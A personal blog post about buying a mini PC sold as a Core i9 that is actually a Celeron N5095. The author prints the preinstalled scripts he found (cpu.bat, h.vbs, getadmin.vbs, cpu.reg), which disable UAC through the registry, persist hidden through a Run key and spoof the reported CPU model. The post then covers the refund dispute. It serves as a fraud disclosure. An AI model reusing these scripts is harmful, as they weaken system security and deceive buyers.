In this article I show the unboxing of an Intel Core i9 Mini PC. It was time to replace my existing monitor mounted PC. My existing "mini-PC" (Industrial VESA mounted - Intel Core i5 5200U Windows 10 Pro DDR3) lasted about 5 years but was not Windows 11 compatible and only had a small SSD and the O/S partition was running out of space. So, it was time for an upgrade...
Overview
After reviewing the price and specs of replacement machines, I decided to purchase a machine direct from China. I landed on another mini-PC with an older Intel Core i9 chip. While this is an older (now obsolete) CPU, all the reviews are very positive, and I could not discount the "bang for the buck" that going with this machine offered. In my case, this machine is not for gaming, but for day-to-day office work so I am not concerned about heavy graphics (i.e. GPU) demand and the embedded Intel UHD graphics capabilities are just fine. I wanted to focus on a relatively fast CPU, at least 16 Gbytes of DDR4 of RAM and a 2 TByte SSD. It also had to be capable of driving at least 2 monitors.
I was able to source a "no name" machine for under $300 direct from China on a Black Friday deal. I could not find anything close to the specs for the price of this machine from local retailers. In fact, the best that I could do locally was to purchase a 2 Tbyte WD SSD on a Black Friday deal for $200 !
Specifications
- CPU: Core i9 8950HK - 4 Cores, 4 threads - up to 3.4 GHz
- RAM: 16 Gig DDR4
- Disk: 2 Tbyte M.2 NVMe SSD
- 4K Video Output: 4K HDMI x2, 4K Type C x1
- Ports: USB 3.0 x2, USB 2.0 x2, Type C x2
- Audio: Mini Audio jack
- WiFi: WiFi 6
- O/S: Windows 11 Pro
- Dimensions (inches): 41/2 x 41/2 x 11/2
Unboxing Video:
I was pleased with the quality of the packaging and the speed with which the machine arrived. This is especially surprising given that the machine was ordered during the nationwide postal strike. The machine took about 2 weeks to be delivered. The machine appears extremely well made and the only issue was that instead of supplying me with a power supply with a North American plug - they supplied a European plug and included a socket convertor. Not a big issue.
Review of the Machine
Having had the opportunity to use the machine for a while now (within an hour), I can safely state that it is a great machine, well worth two or three times the investment! However, it appears to be a fake!!!
Machine is a Fake
Upon closer examination, it was discovered that there was something fishy about the build on the machine that prompted me to take a closer look. What triggered my suspicion was that when I checked my User Access Control settings, I saw that they were set at the lowest setting. So, I changed it to the highest level.
However, after a reboot I noticed that it was set back to the lowest setting?? I traced this back to a file "cpu.bat" that was being executed on windows login. I then traced what the machine was doing more closely and discovered that the machine was setup to run a VB script on login. The script is "h.vbs"
What next? I checked the windows startup apps and sure enough there is a startup app called "h.vbs". Here it is (I have already turned it off).
Now to completely get rid of the offensive app, I downloaded and ran sysinternals:
You can see that the sysinternals scan immediately identifies the suspect script (highlights in red) and I so I used sysinternals to remove it.
So, what do the hacking scripts do? I have included them so that you can preview them.
cpu.bat
@echo off
REM ________________________________________________________________
>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"
if '%errorlevel%' NEQ '0' (
echo Open Command Prompt Administrator...
goto UACPrompt
) else ( goto gotAdmin )
:UACPrompt
echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
echo UAC.ShellExecute "%~s0", "", "", "runas", 1 >> "%temp%\getadmin.vbs"
"%temp%\getadmin.vbs"
exit /B
:gotAdmin
if exist "%temp%\getadmin.vbs" ( del "%temp%\getadmin.vbs" )
pushd "%CD%"
CD /D "%~dp0"
pushd %~dp0
@echo off
rem*************************************************************************************************************************
reg import "%~dp01.reg"
rem*************************************************************************************************************************
rem reg add "hkcu\software\microsoft\internet explorer\main" /v "window title" /t reg_sz /d "科技以人为本" /f
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f
if exist c:\windows\h.vbs goto reg
for /f "tokens=*" %%a in ('echo %0') do (set dpnx=%%a)
copy "%dpnx%" c:\windows\cpu.bat && attrib c:\windows\cpu.bat +h
(
echo set bqad=createobject^("wscript.shell"^)
echo bqad.run "c:\windows\cpu.bat",vbhide
echo wscript.quit
)>c:\windows\h.vbs
attrib c:\windows\h.vbs +h
reg add hklm\software\microsoft\windows\currentversion\run /v hrvbs /t reg_sz /d c:\windows\h.vbs /f
copy "%~dp0cpu.reg" c:\windows\
regedit /s c:\windows\cpu.reg
del "%dpnx%"
taskkill /f /im conime.exe
exit
:reg
regedit /s c:\windows\cpu.reg
taskkill /f /im conime.exe
exit
rem 结束::::::::::::::::::::::::::::::::
h.vbs
set bqad=createobject("wscript.shell")
bqad.run "c:\windows\cpu.bat",vbhide
wscript.quit
getadmin.vbs
Set UAC = CreateObject("Shell.Application")
UAC.ShellExecute "C:\Windows\cpu.bat", "", "", "runas", 1
From examining the scripts, you can see that they "downgrade" the users access controls to the lowest level, yet also the script changes the technical details in the registry to "fake" what the machine actually reports as its specs. You can see from the script that it changes the registry entries using a file named cpu.reg to make it appear that it is a higher-end machine.
cpu.reg
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor]
[HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0]
"Component Information"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"Identifier"="Intel64 Family 6 Model 156 Stepping 0"
"Configuration Data"=hex(9):ff,ff,ff,ff,ff,ff,ff,ff,00,00,00,00,00,00,00,00
"ProcessorNameString"="Intel(R) Core(TM) i9-8950HK CPU @ 2.90GHz"
"VendorIdentifier"="GenuineIntel"
"FeatureSet"=dword:3d1b3fff
"~MHz"=dword:000007cd
"Update Revision"=hex:00,00,00,00,1e,00,00,24
"Update Status"=dword:00000002
"Previous Update Revision"=hex:00,00,00,00,1e,00,00,24
"Platform Specific Field 1"=dword:00000001
[HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1]
"Component Information"=hex:00,00,00,00,00,00,00,00,01,00,00,00,00,00,01,00
"Identifier"="Intel64 Family 6 Model 156 Stepping 0"
"Configuration Data"=hex(9):ff,ff,ff,ff,ff,ff,ff,ff,00,00,00,00,00,00,00,00
"ProcessorNameString"="IIntel(R) Core(TM) i9-8950HK CPU @ 2.90GHz"
"VendorIdentifier"="GenuineIntel"
"FeatureSet"=dword:3d1b3fff
"~MHz"=dword:000007cd
"Update Revision"=hex:00,00,00,00,1e,00,00,24
"Update Status"=dword:00000002
"Previous Update Revision"=hex:00,00,00,00,1e,00,00,24
"Platform Specific Field 1"=dword:00000001
[HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2]
"Component Information"=hex:00,00,00,00,00,00,00,00,02,00,00,00,00,00,02,00
"Identifier"="Intel64 Family 6 Model 156 Stepping 0"
"Configuration Data"=hex(9):ff,ff,ff,ff,ff,ff,ff,ff,00,00,00,00,00,00,00,00
"ProcessorNameString"="Intel(R) Core(TM) i9-8950HK CPU @ 2.90GHz"
"VendorIdentifier"="GenuineIntel"
"FeatureSet"=dword:3d1b3fff
"~MHz"=dword:000007cd
"Update Revision"=hex:00,00,00,00,1e,00,00,24
"Update Status"=dword:00000002
"Previous Update Revision"=hex:00,00,00,00,1e,00,00,24
"Platform Specific Field 1"=dword:00000001
[HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\3]
"Component Information"=hex:00,00,00,00,00,00,00,00,03,00,00,00,00,00,03,00
"Identifier"="Intel64 Family 6 Model 156 Stepping 0"
"Configuration Data"=hex(9):ff,ff,ff,ff,ff,ff,ff,ff,00,00,00,00,00,00,00,00
"ProcessorNameString"="Intel(R) Core(TM) i9-8950HK CPU @ 2.90GHz"
"VendorIdentifier"="GenuineIntel"
"FeatureSet"=dword:3d1b3fff
"~MHz"=dword:000007cd
"Update Revision"=hex:00,00,00,00,1e,00,00,24
"Update Status"=dword:00000002
"Previous Update Revision"=hex:00,00,00,00,1e,00,00,24
"Platform Specific Field 1"=dword:00000001
What Are the "Actual" CPU Specs?
With the malicious scripts disabled, the machine reports back its "actual" specs.
From Windows Specifications:
From Bios:
So, there you have it - the machine is a fake 😡. The machine is, in fact, not based on an Intel i9 8950HK but an Intel Celeron 5095 - much much lower grade CPU.
Here is the difference in the specs (156% reduction in overall performance)
What Are the "Actual" WiFi Specs?
Given the malicious intent to mask the machine CPU details/specifications, we took a look at the actual WiFi specifications as the machine was sold as supporting WiFi 6. A quick assessment shows that the machines radios do not support Wifi 6. The Command Prompt output does not show 802.11ax, indicating that device does not support WiFi 6.
What Are the "Actual" Bluetooth (BT) Specs?
Given the malicious intent to mask the machine CPU details/specifications, we took a look at the actual Bluetooth specifications as the machine was sold as supporting BT 5.2. A quick assessment shows that the machine radios does not support BT 5.2. Device Manager reports on the firmware at LMP 10.x, indicating that device does not support BT 5.2.
What Are the "Actual" SSD Specs?
We also took a look at the actual SSD specifications. The machine does not have an NVMe drive but a standard SSD Sata drive. You can see that the Bus type is "SATA" and not "NVMe":
Requesting a Full Refund
Given the malicious intent to mask the actual machine details/specifications, effectively claiming that it is an Intel Core i9 8950HK, and that other components are not as advertised (WiFi 6, etc.) I have requested a full refund for the purchase. The actual machine (Intel Celeron N5095) is significantly lower in aggregate performance / quality compared to the machine ordered (Intel Core i9 8950HK). I will keep you posted on the status of the case.
Forensic Review Summary Document
First Round of Negotiations - Update
The seller was apologetic and tried to make the case that their supplier/manufacturer may have shipped the wrong machine and would provide a partial refund. I explained that this is not the case as there were deliberate steps taken to mask the machine specifications with the intent of defrauding the purchaser. The seller tried again to blame the supply chain to which I stated that given the situation, I was sticking with my refund request. I suspect that I am heading to an arbitration in this case.
After contacting the seller, I can see that their site has now adjusted their pricing and are now stating that the device comes with a 2Tbyte M.2 NGFF SATA drive instead of a 2Tbyte M.2 NVME drive but still claims to support WiFi 6.
2nd Round of Negotiations - Update
AliExpress rejected the first refund request. A walk through video was produced detailing the rationale for the refund request based on the Forensics report. The response was a $134 refund but questions were raised as to the validity of the report (meaning was it for the machine). This offer was rejected and an additional video submitted, this time demonstrating directly on the PC the fact that the machine does not represent what was ordered and given the fraudulent activity a full refund was requested.
I recorded the video using an IPAD, however AliExpress does not support MOV files and therefore I had to use the OBS "hack" approach to convert the file as simply using conversion software (e.g. VLC) did not work. Here is the article describing ow to convert the video file. How To? - Convert MOV (Apple) Video Format to MP4 (Industry Standard) Video Format
Final Update
After another back and forth with AliExpress, they provided 2 options:
- Return the machine - package it up and ship it and provide the bill to AliExpress for reimbursement. I also would receive a $40 voucher for the trouble
- Keep the machine and get a $168.34 refund as well as the $40 voucher.
Since returning the machine is extra work, and I now have personal identifiable information on the machine, returning it is not an option. So I decided to take the refund of $168.34 plus the $40 discount coupon and keep the machine - Total for the machine after refund is now $130.58 ($115.56 before tax). Taking into consideration the coupon the total for the machine is $90.58.